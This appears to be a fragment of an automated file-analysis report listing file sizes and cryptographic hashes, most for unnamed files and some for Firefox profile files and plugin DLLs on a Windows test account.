SHA2564da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789
SHA51279fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db
-
Filesize
1.7MB
MD50dc4014facf82aa027904c1be1d403c1
SHA15e6d6c020bfc2e6f24f3d237946b0103fe9b1831
SHA256a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7
SHA512cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028
-
Filesize
3.3MB
MD5cea368fc334a9aec1ecff4b15612e5b0
SHA1493d23f72731bb570d904014ffdacbba2334ce26
SHA25607e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541
SHA512bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748
-
Filesize
3.3MB
MD5045b0a3d5be6f10ddf19ae6d92dfdd70
SHA10387715b6681d7097d372cd0005b664f76c933c7
SHA25694b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d
SHA51258255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b
-
Filesize
440B
MD53626532127e3066df98e34c3d56a1869
SHA15fa7102f02615afde4efd4ed091744e842c63f78
SHA2562a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca
SHA512dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin
Filesize6KB
MD54f3399c8ed7cc6f5ca9c1e89d379ce7a
SHA1cf74ac0c5075529f8cd4df7a84d1d4a56b63512a
SHA2563e942432157b9a6a81593eb35787072128c6e9495360c13d14c55fb32fd63306
SHA5127fea88e44727fe6b3e54d95aeb985a7c345b628e50ed7c9219ad97d4f05b13eaa58df9465f09fb9d6cece0f0e4f713a8677d56535aaef7d71f30643e48327d09
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin
Filesize13KB
MD5e1abf3989bdfa034e29a326d1e52ef35
SHA19262987fb3f7b57223c084f3175765939eb785c7
SHA256575f8f950f6f572a75435930647ef3b2a6d51951b1b28c96d8b4475fad8f7bf3
SHA512ffb7e89083e948dc0ed35a43c163383803ee8d0da17e09038de60871f7f109c615c9a19a703550a9a7e4a41aa7398de1e8ff0e0021d3987548947ef9b1ac8b38
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin
Filesize17KB
MD55f1f4fdab2ecc1ec31299930bfdca95e
SHA10694459955be0fcea9b99475212b853cd53407b3
SHA2568383281fb8f9a3b6c7a269aae4cd8dad1bc513728ebd0eebb6b17fd9c40cd0c7
SHA5129fb6c5b5d8a796633818064bbcc14e2a0ae9d17cf01f53cbe1ca77094cfedfec58d720b4390d0fa6bc38df74be4cdb31d57a0290365368a00c4d1ad85209003b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5496eb5b32a251e74007edb28f31fa2f6
SHA143e14fa0b490d4eb99981468d773c7580a875d1c
SHA25632562a80ef9756a6278b2d4c2a06d13da1f9082b267ddfccca9aa01019fc6ae0
SHA512394b8124ae850744829a95ae0417caf0291186477829e9a17d943394f8102d2ccf5d414369623ce236f44052648c4540bbf2eca52cf4662c81b375f1a069abb7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\44bee002-63bc-4374-962e-4e48f2028d43
Filesize671B
MD5e30235f9336819da75d0b0ddd2ba7a9a
SHA1cb084f94a957467f00ad72e95f8fd1365736746a
SHA256b4ac135f75cc2c7890aaa2daa9c2bef1351f65b1e216a02ea1f139fef6e83236
SHA5123c0f0e9cede8ebc9c23522f3154b82cef598c3c837a0b9d2b0207ecf0fbd4a277c8beeda00fb18a8b94c657bc16f3193208e9716bd6188b1a075901fe3de388c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\69654fd6-4258-4a78-be56-0a5b2bd72559
Filesize25KB
MD578271146f0d038443dc2a660d70ae7ee
SHA1e2ae7c52b460fe1dc0f3e630e72af14f15ae4ac4
SHA25619dcce9c9dcd2e90e1a765841daf2861f066aac4ce03b9fcf67fd47c8ed92674
SHA512a5ac7bc08445c5cef4bcbbe6561afa93932e5bf06e55d69e574cd609996271b09f73b04f7ba5f9f91038611dd329ca1784714afba7ff60a2936f5c020c665443
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\ee46a01c-0fae-4bac-b58b-2137b94d997c
Filesize982B
MD58dad78ed5ff172dea9ab4abeb9d6bb24
SHA1b0ef1748dfef9c68726ee7f8f10f95c0d00c3851
SHA256a83bfbf65b06cac513e6d67035c926c4ac9ffaa72aa8435ff45a79e2ea75bfce
SHA5121cfca7a79ef171679f85f398d587e2dc09394457d263c5dbf54508ed3f1dc5c274134c9f7bdc650b6496079f6e79a6b1a1a9a6907b66aab7f60225a5739e4998
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
11KB
MD517252fc7a6f2e10c33f76f61bc9880fe
SHA13da9f50318a00738ae3297d6c047609695d67fb3
SHA256346a8511ee87dd05cfa011e9372fe59e24430c0029c2c35f6d2c6e3a076c0a0a
SHA5120d45ccad104fc60244c549e7a9ee4a3a70258a86d8d71fa6247a101663c0650d8db1b18a2b696e7c082a0427dad358c7459c1cb073934e02938029f0a6b73903
-
Filesize
10KB
MD5ddfdb0573a0ae2aa4a39ca46c5bbff52
SHA18b4eeaa466bcb9b620f969cb513483760d33674b
SHA2560c37a0e93ff0bedb32fef908d14ec6e0fa67001d6d8f20261eca70ec77e1e511
SHA5121eadcc427e359dc2286ce192f2ed2f79e4b06ae65dbbb5f2682cae8cdb11149796ef077ed4f8a167b9705d2b45313478a7ca312d161dd700379350b10a5a877e
-
Filesize
10KB
MD5ffbee06691a99f373168c7538249e9e3
SHA10889af49b341785334a211c1acc10093a6daabfc
SHA25682f913d32629699cebbcc72c7ebc3b3183c57a0510a329e2ae515b1d7b09ba20
SHA5125bc258a29b7f814ba70a4c691914ea09caf49827df253304705d985ecc8bf31aefd38e995b0ba659301ad07ec97859094e191580ed3717898598fcf1e2b8c9a0
-
Filesize
1.2MB
MD5577cd52217da6d7163cea46bb01c107f
SHA182b31cc52c538238e63bdfc22d1ea306ea0b852a
SHA256139762e396fb930400fab8faab80cb679abbe642144261cba24973fb23bcd728
SHA5128abad4eaf2a302dfd9ead058e8c14d996437975730125c46d034a71028921ff36ff5d157ad3671e328ac667ec8095db19fa14a9e8eaaf1a7738aa3d0120b5474
-
Filesize
1.0MB
MD5971b0519b1c0461db6700610e5e9ca8e
SHA19a262218310f976aaf837e54b4842e53e73be088
SHA25647cf75570c1eca775b2dd1823233d7c40924d3a8d93e0e78c943219cf391d023
SHA512d234a9c5a1da8415cd4d2626797197039f2537e98f8f43d155f815a7867876cbc1bf466be58677c79a9199ea47d146a174998d21ef0aebc29a4b0443f8857cb9
-
Filesize
144KB
MD5cc36e2a5a3c64941a79c31ca320e9797
SHA150c8f5db809cfec84735c9f4dcd6b55d53dfd9f5
SHA2566fec179c363190199c1dcdf822be4d6b1f5c4895ebc7148a8fc9fa9512eeade8
SHA512fcea6d62dc047e40182dc4ff1e0522ca935f9aeefdb1517957977bc5d9ac654285a973261401f3b98abf1f6ed62638b9e31306fd7aaeb67214ca42dfc2888af0